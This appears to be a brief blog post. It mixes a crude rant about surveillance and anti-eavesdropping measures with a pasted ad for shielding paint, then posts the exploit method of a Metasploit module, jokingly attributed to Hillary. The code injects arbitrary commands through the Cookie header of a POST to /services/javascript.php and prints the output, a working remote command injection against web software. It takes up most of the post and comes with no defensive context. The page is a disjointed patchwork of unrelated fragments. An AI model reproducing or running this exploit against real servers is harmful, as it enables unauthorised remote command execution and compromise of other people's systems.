oh, well. I was almost forgetting the basic privacy...the wires ...
Friday, April 6, 2018
so...guys...are we about to fuck them this weekend...no more laser mic..no cams, no laptop mic's and cam's...no hacking BIOS...hum...
YSHIELD® shielding paint HSF54 | HF LF | 5 liter. We will be glad to help you. Top coating: Preferably covered with plastic bonded, water-based emulsion paints,…
EBAY.COM
here's Hillary's favourite code :) "This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions."
def
exploit
# Make sure the URI begins with a slash
uri = datastore[
'URI'
]
if
uri[
0
,
1
] !=
'/'
uri =
'/'
+ uri
end
# Make sure the URI ends without a slash, because it's already part of the URI
if
uri[-
1
,
1
] ==
'/'
uri = uri[
0
, uri.length-
1
]
end
function =
"passthru"
key = Rex::Text.rand_text_alpha(
6
)
arguments =
"echo #{key}`"
+payload.raw+
"`#{key}"
res = send_request_cgi({
'uri'
=> uri +
"/services/javascript.php"
,
'method'
=>
'POST'
,
'ctype'
=>
'application/x-www-form-urlencoded'
,
'data'
=>
"app="
+datastore[
'APP'
]+
"&file=open_calendar.js"
,
'headers'
=>
{
'Cookie'
=>
"href="
+function+
":"
+arguments,
'Connection'
=>
'Close'
,
}
})
#default timeout, we don't care about the response
if
(res)
print_status(
"The server returned: #{res.code} #{res.message}"
)
end
resp = res.body.split(key)
if
resp
and
resp[
1
]
print_status(resp[
1
])
else
print_error(
"No response found"
)
end
handler
end
Subscribe to:
Posts (Atom)